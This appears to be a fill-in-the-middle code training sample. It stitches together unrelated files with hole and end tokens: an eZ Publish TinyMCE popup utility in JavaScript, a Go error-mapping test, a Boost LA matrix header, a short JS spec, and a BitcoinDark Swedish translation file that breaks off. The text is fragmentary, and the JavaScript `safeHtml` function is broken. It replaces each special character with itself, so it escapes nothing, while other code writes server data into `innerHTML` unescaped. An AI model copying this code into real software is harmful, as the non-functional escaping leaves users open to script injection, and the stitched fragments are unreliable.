s.tagSelectorCallBack.call( s.tagSelector, false, s.tagSelector[0] );
s.tagSelector.change( s.tagSelectorCallBack );
}
else
{
// by default tag selector refreshes custom attribute values
eZOEPopupUtils.toggleCustomAttributes.call( s.tagSelector );
s.tagSelector.change( eZOEPopupUtils.toggleCustomAttributes );
}
}
if ( s.onInitDone && s.onInitDone.call )
s.onInitDone.call( eZOEPopupUtils, s.editorElement, s.tagName, ed );
if ( s.onInitDoneArray && s.onInitDoneArray.length )
jQuery.each( s.onInitDoneArray, function( i, fn ){
if ( fn && fn.call )
fn.call( eZOEPopupUtils, s.editorElement, s.tagName, ed );
} );
},
/**
* Save changes from form values to editor element attributes but first:
* - validate values according to class names and stop if not valid
* - create editor element if it does not exist either using callbacks or defaults
* - or call optional edit callback to edit/fixup existing element
* - Set attributes from form values using callback if set or default TinyMCE handler
*/
save: function()
{
var ed = tinyMCEPopup.editor, s = eZOEPopupUtils.settings, n, arr, tmp, f = document.forms[0];
if ( s.tagSelector && s.tagSelector.size() && s.tagSelector[0].value )
{
if ( s.tagSelector[0].checked === undefined || s.tagSelector[0].checked === true )
s.selectedTag = s.tagSelector[0].value;
else if ( s.tagSelector[0].checked === false )
s.selectedTag = s.tagName;
}
// validate the general attributes
if ( (errorArray = AutoValidator.validate( jQuery( '#' + s.tagName + '_attributes' )[0] ) ) && errorArray.length )
{
tinyMCEPopup.alert(tinyMCEPopup.getLang('invalid_data') + "\n" + errorArray.join(", ") );
return false;
}
// validate the custom attributes
if ( (errorArray = AutoValidator.validate( jQuery( '#' + s.selectedTag + '_customattributes' )[0] ) ) && errorArray.length )
{
tinyMCEPopup.alert(tinyMCEPopup.getLang('invalid_data') + "\n" + errorArray.join(", ") );
return false;
}
if ( tinymce.isWebKit )
ed.getWin().focus();
var args = jQuery.extend(
false,
eZOEPopupUtils.getCustomAttributeArgs( s.selectedTag + '_customattributes'),
eZOEPopupUtils.getGeneralAttributeArgs( s.tagName + '_attributes')
);
if ( s.cssClass )
args['class'] = s.cssClass + ( args['class'] ? ' ' + args['class'] : '');
ed.execCommand('mceBeginUndoLevel');
if ( !s.editorElement )
{
// create new node if none is defined and if tag type is defined in ezXmlToXhtmlHash or tagGenerator is defined
if ( s.tagGenerator )
{
s.editorElement = eZOEPopupUtils.insertHTMLCleanly( ed, s.tagGenerator.call( eZOEPopupUtils, s.tagName, s.selectedTag, s.editorSelectedHtml ), '__mce_tmp' );
}
else if ( s.tagCreator )
{
s.editorElement = s.tagCreator.call( eZOEPopupUtils, ed, s.tagName, s.selectedTag, s.editorSelectedHtml );
}
else if ( s.tagName === 'link' )
{
var tempid = args['id'];
args['id'] = '__mce_tmp';
ed.execCommand('mceInsertLink', false, args, {skip_undo : 1} );
s.editorElement = ed.dom.get('__mce_tmp');
// fixup if we are inside embed tag
if ( tmp = eZOEPopupUtils.getParentByTag( s.editorElement, 'div,span', 'ezoeItemNonEditable' ) )
{
var span = document.createElement("span");
span.innerHTML = s.editorElement.innerHTML;
s.editorElement.parentNode.replaceChild(span, s.editorElement);
s.editorElement.innerHTML = '';
tmp.parentNode.insertBefore(s.editorElement, tmp);
s.editorElement.appendChild( tmp );
}
args['id'] = tempid;
}
else if ( eZOEPopupUtils.xmlToXhtmlHash[s.tagName] )
{
s.editorElement = eZOEPopupUtils.insertTagCleanly( ed, eZOEPopupUtils.xmlToXhtmlHash[s.tagName], tinymce.isIE ? ' ' : '<br data-mce-bogus="1" />' );
}
if ( s.onTagGenerated )
{
n = s.onTagGenerated.call( eZOEPopupUtils, s.editorElement, ed, args );
if ( n && n.nodeName )
s.editorElement = n;
}
}
else if ( s.tagEditor )
{
// we already have a element, if custom tagEditor function is defined it can edit it
n = s.tagEditor.call( eZOEPopupUtils, s.editorElement, ed, s.selectedTag, args );
if ( n && n.nodeName )
s.editorElement = n;
}
if ( s.editorElement )
{
if ( s.tagAttributeEditor )
{
n = s.tagAttributeEditor.call( eZOEPopupUtils, ed, s.editorElement, args );
if ( n && n.nodeName )
s.editorElement = n;
}
else
ed.dom.setAttribs( s.editorElement, args );
if ( args['id'] === undefined )
ed.dom.setAttrib( s.editorElement, 'id', '' );
if ( 'TABLE'.indexOf( s.editorElement.tagName ) === 0 )
ed.selection.select( jQuery( s.editorElement ).find( "tr:first-child > *:first-child" ).get(0), true );
else if ( 'DIV'.indexOf( s.editorElement.tagName ) === 0 )
ed.selection.select( s.editorElement );
else
ed.selection.select( s.editorElement, true );
ed.nodeChanged();
}
ed.execCommand('mceEndUndoLevel');
ed.execCommand('mceRepaint');
tinyMCEPopup.close();
return false;
},
/**
* Insert raw html and tries to cleanup any issues that might happen (related to paragraphs and block tags)
* makes sure block nodes do not break the html structure they are inserted into
*
* @param ed TinyMCE editor instance
* @param {String} html
* @param {String} id
* @return HtmlElement
*/
insertHTMLCleanly: function( ed, html, id )
{
var paragraphCleanup = false, newElement;
if ( html.indexOf( '<div' ) === 0 || html.indexOf( '<pre' ) === 0 )
{
paragraphCleanup = true;
}
ed.execCommand('mceInsertRawHTML', false, html, {skip_undo : 1} );
newElement = ed.dom.get( id );
if ( paragraphCleanup ) this.paragraphCleanup( ed, newElement );
return newElement;
},
/**
* Only for use for block tags ( appends or prepends tag relative to current tag )
*
* @param ed TinyMCE editor instance
* @param {String} tag Tag Name
* @param {String} content Inner content of tag, can be html, but only tested with plain text
* @param {Array} args Optional parameter that is passed as second parameter to ed.dom.setAttribs() if set.
* @return HtmlElement
*/
insertTagCleanly: function( ed, tag, content, args )
{
var edCurrentNode = eZOEPopupUtils.settings.editorSelectedNode ? eZOEPopupUtils.settings.editorSelectedNode : ed.selection.getNode(),
newElement = edCurrentNode.ownerDocument.createElement( tag );
if ( tag !== 'img' ) newElement.innerHTML = content;
if ( edCurrentNode.nodeName === 'TD' )
edCurrentNode.appendChild( newElement );
else if ( edCurrentNode.nextSibling )
edCurrentNode.parentNode.insertBefore( newElement, edCurrentNode.nextSibling );
else if ( edCurrentNode.nodeName === 'BODY' )// IE when editor is empty
edCurrentNode.appendChild( newElement );
else
edCurrentNode.parentNode.appendChild( newElement );
if ( (tag === 'div' || tag === 'pre') && edCurrentNode && edCurrentNode.nodeName.toLowerCase() === 'p' )
{
this.paragraphCleanup( ed, newElement );
}
if ( args ) ed.dom.setAttribs( newElement, args );
return newElement;
},
/**
* Cleanup broken paragraphs after inserting block tags into paragraphs
*
* @param ed TinyMCE editor instance
* @param {HtmlElement} el
*/
paragraphCleanup: function( ed, el )
{
var emptyContent = [ '', '<br>', '<BR>', ' ', ' ', " " ];
if ( el.previousSibling
&& el.previousSibling.nodeName.toLowerCase() === 'p'
&& ( !el.previousSibling.hasChildNodes() || jQuery.inArray( el.previousSibling.innerHTML, emptyContent ) !== -1 ))
{
el.parentNode.removeChild( el.previousSibling );
}
if ( el.nextSibling
&& el.nextSibling.nodeName.toLowerCase() === 'p'
&& ( !el.nextSibling.hasChildNodes() || jQuery.inArray( el.nextSibling.innerHTML, emptyContent ) !== -1 ))
{
el.parentNode.removeChild( el.nextSibling );
}
},
/**
* Removes some unwanted stuff from attribute values
*
* @param {String} value
* @return {String}
*/
safeHtml: function( value )
{
value = value.replace(/&/g, '&');
value = value.replace(/\"/g, '"');
value = value.replace(/</g, '<');
value = value.replace(/>/g, '>');
return value;
},
xmlToXhtmlHash: {
'paragraph': 'p',
'literal': 'pre',
'anchor': 'a',
'link': 'a'
},
cancel: function()
{
tinyMCEPopup.close();
},
/**
* Removes all children of a node safly (especially needed to clear select options and table data)
* Also disables tag if it was an select
*
* @param {HtmlElement} node
*/
removeChildren: function( node )
{
if ( !node ) return;
while ( node.hasChildNodes() )
{
node.removeChild( node.firstChild );
}
if ( node.nodeName === 'SELECT' ) node.disabled = true;
},
/**
* Adds options to a selection based on object with name / value pairs or array
* and disables select tag if no options where added.
*
* @param {HtmlElement} node
* @param {Object|Array} o
*/
addSelectOptions: function( node, o )
{
if ( !node || node.nodeName !== 'SELECT' ) return;
var opt, c = 0, i;
if ( o.constructor.toString().indexOf('Array') === -1 )
{
for ( key in o )
{
opt = document.createElement("option");
opt.value = key === '0' || key === '-0-' ? '' : key;
opt.innerHTML = o[key]
node.appendChild( opt );
c++;
}
}
else
{
for ( i = 0, c = o.length; i < c; i++ )
{
opt = document.createElement("option");
opt.value = opt.innerHTML = o[i];
node.appendChild( opt );
}
}
node.disabled = c === 0;
},
/**
* Get custom attribute value from form values and map them to style value as well
*
* @param {HtmlElement} node
* @return {Object} Hash of attributes and their values for use on editor elements
*/
getCustomAttributeArgs: function( node )
{
var args = {
'customattributes': '',
'style': ''
}, s = eZOEPopupUtils.settings, handler = s.customAttributeSaveHandler;
var customArr = [];
jQuery( '#' + node + ' input,#' + node + ' select,#' + node + ' textarea' ).each(function( i, el )
{
var o = jQuery( el ), name = o.attr("name"), value, style;
if ( o.hasClass('mceItemSkip') || !name ) return;
if ( o.attr("type") === 'checkbox' && !o.prop("checked") ) return;
// see if there is a save hander that needs to do some work on the value
if ( handler[el.id] !== undefined && handler[el.id].call !== undefined )
value = handler[el.id].call( o, el, o.val() );
else
value = o.val()
// add to styles if custom attibute is defined in customAttributeStyleMap
if ( value !== '' && s.customAttributeStyleMap && s.customAttributeStyleMap[name] !== undefined )
{
// filtered because the browser (ie,ff&opera) convert the tag to font tag in certain circumstances
style = s.customAttributeStyleMap[name];
if ( /[margin|border|padding|width|height]/.test( style ) )
args['style'] += style + ': ' + value + '; ';
}
customArr.push( name + '|' + value );
});
args['customattributes'] = customArr.join('attribute_separation');
return args;
},
/**
* Get general attributes for tag from form values
*
* @param {HtmlElement} node
* @return {Object} Hash of attributes and their values for use on editor elements
*/
getGeneralAttributeArgs: function( node )
{
var args = {}, handler = eZOEPopupUtils.settings.customAttributeSaveHandler;
jQuery( '#' + node + ' input,#' + node + ' select' ).each(function( i, el )
{
var o = jQuery( el ), name = o.attr("name");
if ( o.hasClass('mceItemSkip') || !name ) return;
if ( o.attr("type") === 'checkbox' && !o.prop("checked") ) return;
// see if there is a save hander that needs to do some work on the value
if ( handler[el.id] !== undefined && handler[el.id].call !== undefined )
args[name] = handler[el.id].call( o, el, o.val() );
else
args[name] = o.val()
});
return args;
},
/**
* Get parent tag by tag name with optional class name and type check
*
* @param {HtmlElement} n
* @param {String} tag
* @param {String} className
* @param {String} type
* @param {Boolean} checkElement Checks n as well if true
* @return {HtmlElement|False}
*/
getParentByTag: function( n, tag, className, type, checkElement )
{
if ( className ) className = ' ' + className + ' ';
tag = ',' + tag.toUpperCase() + ',';
while ( n !== undefined && n.nodeName !== undefined && n.nodeName !== 'BODY' )
{
if ( checkElement && tag.indexOf( ',' + n.nodeName + ',' ) !== -1
&& ( !className || (' ' + n.className + ' ').indexOf( className ) !== -1 )
&& ( !type || n.getAttribute('type') === type ) )
{
return n;
}
n = n.parentNode;
checkElement = true;
}
return false;
},
toggleCustomAttributes: function( e )
{
if ( this.each !== undefined )
node = this;
else
node = jQuery( this );
jQuery('table.custom_attributes').each(function( i, el ){
el = jQuery( el );
if ( el.attr('id') === node[0].value + '_customattributes' )
el.show();
else
el.hide();
});
},
/**
* Sets deafult values for based on custom attribute value
* global objects: ez
*
* @param string node Element id of parent node for custom attribute form
* @param string valueString The raw customattributes string from attribute
*/
initCustomAttributeValue: function( node, valueString )
{
if ( valueString === null || !document.getElementById( node ) )
return;
var arr = valueString.split('attribute_separation'), values = {}, t, handler = eZOEPopupUtils.settings.customAttributeInitHandler;
for(var i = 0, l = arr.length; i < l; i++)
{
t = arr[i].split('|');
var key = t.shift();
values[key] = t.join('|');
}
jQuery( '#' + node + ' input,#' + node + ' select,#' + node + ' textarea' ).each(function( i, el )
{
var o = jQuery( el ), name = el.name;
if ( o.hasClass('mceItemSkip') || !name )
return;
if ( values[name] !== undefined )
{
if ( handler[el.id] !== undefined && handler[el.id].call !== undefined )
handler[el.id].call( o, el, values[name] );
else if ( el.type === 'checkbox' )
el.checked = values[name] == el.value;
else if ( el.type === 'select-one' )
{
// Make sure selecion has value before we set it (#014986)
for( var i = 0, l = el.options.length; i < l; i++ )
{
if ( el.options[i].value == values[name] ) el.value = values[name];
}
}
else
el.value = values[name];
try {
el.onchange();
} catch (ex) {
// Try fire event, ignore errors
}
}
});
},
initGeneralmAttributes: function( node, editorElement )
{
// init general attributes form values from tinymce element values
var handler = eZOEPopupUtils.settings.customAttributeInitHandler, cssReplace = function( s ){
s = s.replace(/(webkit-[\w\-]+|Apple-[\w\-]+|mceItem\w+|ezoeItem\w+|mceVisualAid)/g, '');
if ( !eZOEPopupUtils.settings.cssClass )
return s;
jQuery.each(eZOEPopupUtils.settings.cssClass.split(' '), function(index, value){
s = s.replace( value, '' );
});
return s;
};
jQuery( '#' + node + ' input,#' + node + ' select' ).each(function( i, el )
{
var o = jQuery( el ), name = el.name, v;
if ( o.hasClass('mceItemSkip') ) return;
if ( name === 'class' )
v = jQuery.trim( cssReplace( editorElement.className ) );
else {
v = tinyMCEPopup.editor.dom.getAttrib( editorElement, name );
if ( !v && tinymce.DOM.getAttrib(editorElement, 'style') && editorElement.style[name.toLowerCase()] ) {
v = editorElement.style[name.toLowerCase()];
}
}
if ( v !== false && v !== null && v !== undefined )
{
if ( handler[el.id] !== undefined && handler[el.id].call !== undefined )
handler[el.id].call( o, el, v );
else if ( el.type === 'checkbox' )
el.checked = v == el.value;
else if ( el.type === 'select-one' )
{
// Make sure selection has value before we set it (#014986)
for( var i = 0, l = el.options.length; i < l; i++ )
{
if ( el.options[i].value == v ) el.value = v;
}
}
else
el.value = v;
try {
el.onchange();
} catch (ex) {
// Try fire event, ignore errors
}
}
});
},
switchTagTypeIfNeeded: function ( currentNode, targetTag )
{
if ( currentNode && currentNode.nodeName && targetTag !== currentNode.nodeName.toLowerCase() )
{
// changing to a different node type
var ed = tinyMCEPopup.editor, doc = ed.getDoc(), newNode = doc.createElement( targetTag );
// copy children
if ( newNode.nodeName !== 'IMG' )
{
for ( var c = 0; c < currentNode.childNodes.length; c++ )
newNode.appendChild( currentNode.childNodes[c].cloneNode(1) );
}
// copy attributes
for ( var a = 0; a < currentNode.attributes.length; a++ )
ed.dom.setAttrib(newNode, currentNode.attributes[a].name, ed.dom.getAttrib( currentNode, currentNode.attributes[a].name ) );
if ( currentNode.parentNode.nodeName === 'BODY'
&& ( newNode.nodeName === 'SPAN' || newNode.nodeName === 'IMG' )
)
{
// replace node but wrap inside a paragraph first
var p = doc.createElement('p');
p.appendChild( newNode );
currentNode.parentNode.replaceChild( p, currentNode );
}
else
{
// replace node
currentNode.parentNode.replaceChild( newNode, currentNode );
}
return newNode;
}
return currentNode;
},
selectByEmbedId: function( id, node_id, name, useNode )
{
// redirects to embed window of a specific object id
// global objects: ez
if ( id !== undefined )
{
var s = tinyMCEPopup.editor.settings, type = useNode === true && node_id > 0 ? 'eZNode_' + node_id : 'eZObject_' + id ;
window.location = s.ez_extension_url + '/relations/' + s.ez_contentobject_id + '/' + s.ez_contentobject_version + '/auto/' + type;
}
},
BIND: function()
{
// Binds arguments to a function, so when you call the returned wrapper function,
// arguments are intact and arguments passed to the wrapper function is appended.
// first argument is function, second is 'this' and the rest is arguments
var __args = Array.prototype.slice.call( arguments ), __fn = __args.shift(), __obj = __args.shift();
return function(){return __fn.apply( __obj, __args.concat( Array.prototype.slice.call( arguments ) ) )};
},
searchEnter: function( e, isButton )
{
// post search form if enter key is pressed or isButton = true
if ( isButton )
{
eZOEPopupUtils.search();
return false;
}
e = e || window.event;
key = e.which || e.keyCode;
if ( key == 13)
{
eZOEPopupUtils.search(); // enter key
return false;
}
return true;
},
browse: function( nodeId, offset )
{
// browse for a specific node id and a offset on the child elements
var postData = eZOEPopupUtils.jqSafeSerilizer('browse_box'), o = offset ? offset : 0;
jQuery.ez('ezoe::browse::' + nodeId + '::' + o, postData, function( data ){ eZOEPopupUtils.browseCallBack( data, 'browse' ) } );
jQuery('#browse_progress' ).show();
},
search: function( offset )
{
// serach for nodes with input and select form elements inside a 'search_box' container element
if ( jQuery.trim( jQuery('#SearchText').val() ) )
{
var postData = eZOEPopupUtils.jqSafeSerilizer('search_box'), o = offset ? offset : 0;
jQuery.ez('ezjsc::search::x::' + o, postData, eZOEPopupUtils.searchCallBack );
jQuery('#search_progress' ).show();
}
},
jqSafeSerilizer: function( id )
{
// jQuery encodes form names incl [] if you pass an object / array to it, avoid by using string
var postData = '', val;
jQuery.each( jQuery('#' + id + ' input, #' + id + ' select').serializeArray(), function(i, o){
if ( o.value )
postData += ( postData ? '&' : '') + o.name + '=' + o.value;
});
return postData;
},
browseCallBack: function( data, mode, emptyCallBack )
{
// call back function for the browse() ajax call, generates the html markup with paging and path header (if defined)
mode = mode ? mode : 'browse';
jQuery('#' + mode + '_progress' ).hide();
var ed = tinyMCEPopup.editor, tbody = jQuery('#' + mode + '_box_prev tbody')[0], thead = jQuery('#' + mode + '_box_prev thead')[0], tfoot = jQuery('#' + mode + '_box_prev tfoot')[0], tr, td, tag, hasImage, emptyList = true;
eZOEPopupUtils.removeChildren( tbody );
eZOEPopupUtils.removeChildren( thead );
eZOEPopupUtils.removeChildren( tfoot );
if ( data && data.content !== '' )
{
var fn = mode + ( mode === 'browse' ? '('+ data.content['node']['node_id'] + ',' : '(' );
var classGenerator = eZOEPopupUtils.settings.browseClassGenerator, linkGenerator = eZOEPopupUtils.settings.browseLinkGenerator;
if ( data.content['node'] && data.content['node']['name'] )
{
tr = document.createElement("tr"), td = document.createElement("td");
tr.className = 'browse-path-list';
td.className = 'thight';
tr.appendChild( td );
td = document.createElement("td")
td.setAttribute('colspan', '3');
if ( data.content['node']['path'] !== false && data.content['node']['node_id'] != 1 )
{
// Prepend root node so you can browse to the root of the installation
data.content['node']['path'].splice(0,0,{'node_id':1, 'name': ed.getLang('ez.root_node_name'), 'class_name': 'Folder'});
jQuery.each( data.content['node']['path'], function( i, n )
{
tag = document.createElement("a");
tag.setAttribute('href', 'JavaScript:eZOEPopupUtils.' + mode + '(' + n.node_id + ');');
tag.setAttribute('title', ed.getLang('advanced.type') + ': ' + n.class_name );
tag.innerHTML = n.name;
td.appendChild( tag );
tag = document.createElement("span");
tag.innerHTML = ' / ';
td.appendChild( tag );
});
}
tag = document.createElement("span");
tag.innerHTML = data.content['node']['name'];
td.appendChild( tag );
tr.appendChild( td );
thead.appendChild( tr );
}
if ( data.content['list'] )
{
jQuery.each( data.content['list'], function( i, n )
{
tr = document.createElement("tr"), td = document.createElement("td"), tag = document.createElement("input"), isImage = false;
tag.setAttribute('type', 'radio');
tag.setAttribute('name', 'selectembedobject');
tag.className = 'input_noborder';
tag.setAttribute('value', n.contentobject_id);
tag.setAttribute('title', ed.getLang('advanced.select') );
tag.onclick = eZOEPopupUtils.BIND( eZOEPopupUtils.selectByEmbedId, eZOEPopupUtils, n.contentobject_id, n.node_id, n.name );
td.appendChild( tag );
td.className = 'thight';
tr.appendChild( td );
td = document.createElement("td");
if ( linkGenerator.call !== undefined )
{
tag = linkGenerator.call( this, n, mode, ed );
}
else if ( n.children_count )
{
tag = document.createElement("a");
tag.setAttribute('href', 'JavaScript:eZOEPopupUtils.' + mode + '(' + n.node_id + ');');
tag.setAttribute('title', ed.getLang('browse') + ': ' + n.url_alias );
}
else
{
tag = document.createElement("span");
tag.setAttribute('title', n.url_alias );
}
tag.innerHTML = n.name;
td.appendChild( tag );
tr.appendChild( td );
td = document.createElement("td");
tag = document.createElement("span");
tag.innerHTML = n.class_name;
td.appendChild( tag );
tr.appendChild( td );
td = document.createElement("td");
var imageIndex = eZOEPopupUtils.indexOfImage( n, eZOEPopupUtils.settings.browseImageAlias );
if ( imageIndex !== -1 )
{
tag = document.createElement("span");
tag.className = 'image_preview';
var previewUrl = ed.settings.ez_root_url + encodeURI( n.data_map[ n.image_attributes[imageIndex] ].content[eZOEPopupUtils.settings.browseImageAlias].url )
tag.innerHTML += ' <a href="#">' + ed.getLang('preview.preview_desc') + '<img src="' + previewUrl + '" /></a>';<|fim▁hole|> }
tr.appendChild( td );
tr.className = classGenerator.call( this, n, hasImage, ed );
tbody.appendChild( tr );
emptyList = false;
} );
}
// Make sure int params that needs to be subtracted/added are native int's
var offset = eZOEPopupUtils.Int( data.content['offset'] ), limit = eZOEPopupUtils.Int( data.content['limit'] );
tr = document.createElement("tr"), td = document.createElement("td");
tr.appendChild( document.createElement("td") );
if ( offset > 0 )
{
tag = document.createElement("a");
tag.setAttribute('href', 'JavaScript:eZOEPopupUtils.' + fn + (offset - limit) + ');');
tag.innerHTML = '<< ' + ed.getLang('advanced.previous');
td.appendChild( tag );
}
tr.appendChild( td );
td = document.createElement("td");
td.setAttribute('colspan', '2');
if ( (offset + limit) < data.content['total_count'] )
{
tag = document.createElement("a");
tag.setAttribute('href', 'JavaScript:eZOEPopupUtils.' + fn + (offset + limit) + ');');
tag.innerHTML = ed.getLang('advanced.next') + ' >>';
td.appendChild( tag );
}
tr.appendChild( td );
tfoot.appendChild( tr );
}
if ( emptyList && emptyCallBack !== undefined && emptyCallBack.call !== undefined )
{
emptyCallBack.call( this, tbody, mode, ed );
}
return false;
},
searchCallBack : function( searchData )
{
// wrapper function for browseCallBack, called by ajax call in search()
var data = { 'content': '' };
if ( searchData && searchData.content !== '' )
{
data['content'] = {
'limit': searchData.content.SearchLimit,
'offset': searchData.content.SearchOffset,
'total_count': searchData.content.SearchCount,
'list': searchData.content.SearchResult
};
}
return eZOEPopupUtils.browseCallBack( data, 'search', function( tbody, mode, ed ){
// callback for use when result is empty
var tr = document.createElement("tr"), td = document.createElement("td"), tag = document.createElement("span");
tr.appendChild( document.createElement("td") );
tr.className = 'search-result-empty';
td.setAttribute('colspan', '3');
tag.innerHTML = ed.getLang('ez.empty_search_result').replace('<search_string>', jQuery('#SearchText').val() );
td.appendChild( tag );
tr.appendChild( td );
tbody.appendChild( tr );
} );
},
indexOfImage: function( jsonNode, alias )
{
if ( !alias ) alias = eZOEPopupUtils.settings.browseImageAlias;
var index = -1;
jQuery.each( jsonNode.image_attributes, function( i, attr )
{
if ( index === -1 && jsonNode.data_map[ attr ] && jsonNode.data_map[ attr ].content[ alias ] )
index = i;
});
return index;
},
// some reusable functions from ezcore
ie65: /MSIE [56]/.test( navigator.userAgent ),
Int: function(value, fallBack)
{
// Checks if value is a int, if not fallBack or 0 is returned
value = parseInt( value );
return isNaN( value ) ? ( fallBack !== undefined ? fallBack : 0 ) : value;
},
Float: function(value, fallBack)
{
// Checks if value is float, if not fallBack or 0 is returned
value = parseFloat( value );
return isNaN( value ) ? ( fallBack !== undefined ? fallBack : 0 ) : value;
},
min: function()
{
// Returns the lowest number, or null if none
var min = null;
for (var i = 0, a = arguments, l = a.length; i < l; i++)
if (min === null || min > a[i]) min = a[i];
return min;
}
};<|fim▁end|> | td.appendChild( tag );
hasImage = true; |
<|file_name|>errors_test.go<|end_file_name|><|fim▁begin|>// Copyright 2012, 2013 Canonical Ltd.
// Licensed under the AGPLv3, see LICENCE file for details.
package common_test
import (
stderrors "errors"
jc "github.com/juju/testing/checkers"
gc "launchpad.net/gocheck"
"github.com/wallyworld/core/errors"
"github.com/wallyworld/core/state"
"github.com/wallyworld/core/state/api/params"
"github.com/wallyworld/core/state/apiserver/common"
"github.com/wallyworld/core/testing/testbase"
)
type errorsSuite struct {
testbase.LoggingSuite
}
var _ = gc.Suite(&errorsSuite{})
var errorTransformTests = []struct {
err error
code string
helperFunc func(error) bool
}{{
err: errors.NotFoundf("hello"),
code: params.CodeNotFound,
helperFunc: params.IsCodeNotFound,
}, {
err: errors.Unauthorizedf("hello"),
code: params.CodeUnauthorized,
helperFunc: params.IsCodeUnauthorized,
}, {
err: state.ErrCannotEnterScopeYet,
code: params.CodeCannotEnterScopeYet,
helperFunc: params.IsCodeCannotEnterScopeYet,
}, {
err: state.ErrCannotEnterScope,
code: params.CodeCannotEnterScope,
helperFunc: params.IsCodeCannotEnterScope,
}, {
err: state.ErrExcessiveContention,
code: params.CodeExcessiveContention,
helperFunc: params.IsCodeExcessiveContention,
}, {
err: state.ErrUnitHasSubordinates,
code: params.CodeUnitHasSubordinates,
helperFunc: params.IsCodeUnitHasSubordinates,
}, {
err: common.ErrBadId,
code: params.CodeNotFound,
helperFunc: params.IsCodeNotFound,
}, {
err: common.NoAddressSetError("unit-mysql-0", "public"),
code: params.CodeNoAddressSet,
helperFunc: params.IsCodeNoAddressSet,
}, {
err: common.ErrBadCreds,
code: params.CodeUnauthorized,
helperFunc: params.IsCodeUnauthorized,
}, {
err: common.ErrPerm,
code: params.CodeUnauthorized,
helperFunc: params.IsCodeUnauthorized,
}, {
err: common.ErrNotLoggedIn,
code: params.CodeUnauthorized,
helperFunc: params.IsCodeUnauthorized,
}, {
err: state.NotProvisionedError("0"),
code: params.CodeNotProvisioned,
helperFunc: params.IsCodeNotProvisioned,
}, {
err: errors.AlreadyExistsf("blah"),
code: params.CodeAlreadyExists,
helperFunc: params.IsCodeAlreadyExists,
}, {
err: common.ErrUnknownWatcher,
code: params.CodeNotFound,
helperFunc: params.IsCodeNotFound,
}, {
err: &state.NotAssignedError{&state.Unit{}}, // too sleazy?! nah..
code: params.CodeNotAssigned,
helperFunc: params.IsCodeNotAssigned,
}, {
err: common.ErrStoppedWatcher,
code: params.CodeStopped,
helperFunc: params.IsCodeStopped,
}, {
err: &state.HasAssignedUnitsError{"42", []string{"a"}},
code: params.CodeHasAssignedUnits,
helperFunc: params.IsCodeHasAssignedUnits,
}, {
err: common.ErrTryAgain,
code: params.CodeTryAgain,
helperFunc: params.IsCodeTryAgain,
}, {
err: stderrors.New("an error"),
code: "",
}, {
err: unhashableError{"foo"},
code: "",
}, {
err: nil,
code: "",
}}
type unhashableError []string
func (err unhashableError) Error() string {
return err[0]
}
func (s *errorsSuite) TestErrorTransform(c *gc.C) {
for _, t := range errorTransformTests {
err1 := common.ServerError(t.err)
if t.err == nil {
c.Assert(err1, gc.IsNil)
} else {
c.Assert(err1.Message, gc.Equals, t.err.Error())
c.Assert(err1.Code, gc.Equals, t.code)
if t.helperFunc != nil {
c.Assert(err1, jc.Satisfies, t.helperFunc)<|fim▁hole|>}<|fim▁end|> | }
}
} |
<|file_name|>identity_matrix.hpp<|end_file_name|><|fim▁begin|>//Copyright (c) 2008-2009 Emil Dotchevski and Reverge Studios, Inc.
//Distributed under the Boost Software License, Version 1.0. (See accompanying
//file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
#ifndef UUID_D6250026A17F11DEA29012BF55D89593
#define UUID_D6250026A17F11DEA29012BF55D89593
#include <boost/la/config.hpp>
#include <boost/la/deduce_matrix.hpp>
#include <boost/assert.hpp>
#include <boost/static_assert.hpp>
namespace
boost
{
namespace
la
{
namespace
la_detail
{
template <class T,int Dim>
class
identity_matrix_
{
identity_matrix_( identity_matrix_ const & );
identity_matrix_ & operator=( identity_matrix_ const & );
~identity_matrix_();
public:
template <class R>
BOOST_LA_INLINE_TRIVIAL
operator R() const
{
R r;
assign(r,*this);
return r;
}
};
}
template <class Matrix>
struct matrix_traits;
template <class T,int Dim>
struct
matrix_traits< la_detail::identity_matrix_<T,Dim> >
{
typedef la_detail::identity_matrix_<T,Dim> this_matrix;
typedef T scalar_type;
static int const rows=Dim;
static int const cols=Dim;
template <int Row,int Col>
static
BOOST_LA_INLINE_CRITICAL
scalar_type
r( this_matrix const & x )
{
BOOST_ASSERT(&x==0);
BOOST_STATIC_ASSERT(Row>=0);
BOOST_STATIC_ASSERT(Row<Dim);
BOOST_STATIC_ASSERT(Col>=0);
BOOST_STATIC_ASSERT(Col<Dim);
return scalar_type(Row==Col);
}
static
BOOST_LA_INLINE_CRITICAL
scalar_type
ir( int row, int col, this_matrix const & x )
{
BOOST_ASSERT(&x==0);
BOOST_ASSERT(row>=0);
BOOST_ASSERT(row<Dim);
BOOST_ASSERT(col>=0);
BOOST_ASSERT(col<Dim);
return scalar_type(row==col);
}
};
template <class T,int Dim,int R,int C,class S>
struct
deduce_matrix<la_detail::identity_matrix_<T,Dim>,R,C,S>
{
typedef mat<S,R,C> type;
};
<|fim▁hole|> identity_matrix()
{
return *(la_detail::identity_matrix_<T,Dim> const *)0;
}
}
}
#endif<|fim▁end|> | template <class T,int Dim>
BOOST_LA_INLINE_TRIVIAL
la_detail::identity_matrix_<T,Dim> const & |
<|file_name|>index-spec.6.js<|end_file_name|><|fim▁begin|>/**<|fim▁hole|> * @author Adam Meadows <[email protected]>
* @copyright 2015 Adam Meadows. All rights reserved.
*/
'use strict';
/* eslint-disable max-nested-callbacks */
let $ = require('jquery');
let main = require('aiw-ui');
describe('main', () => {
let $container;
beforeEach(() => {
$container = $('<div/>');
main.render($container[0]);
});
it('renders template', () => {
expect($('.main p', $container)).toHaveText('This is my first webpack project!');
});
});<|fim▁end|> | |
<|file_name|>bitcoin_sv.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" ?><!DOCTYPE TS><TS language="sv" version="2.1">
<context>
<name>AboutDialog</name>
<message>
<location filename="../forms/aboutdialog.ui" line="+14"/>
<source>About BitcoinDark</source>
<translation>Vad du behöver veta om BTestcoin</translation>
</message>
<message>
<location line="+39"/>
<source><b>BitcoinDark</b> version</source>
<translation><b>BitcoinDark</b> version</translation>
</message>
<message>
<location line="+41"/>
<source>Copyright © 2009-2014 The Bitcoin developers
Copyright © 2012-2014 The NovaCoin developers
Copyright © 2014 The BitcoinDark developers</source>
<translation>Copyright © 2009-2014 The Bitcoin developers
Copyright © 2012-2014 The NovaCoin developers
Copyright © 2014 The BitcoinDark developers</translation>
</message>
<message>
<location line="+15"/>
<source>
This is experimental software.
Distributed under the MIT/X11 software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php.
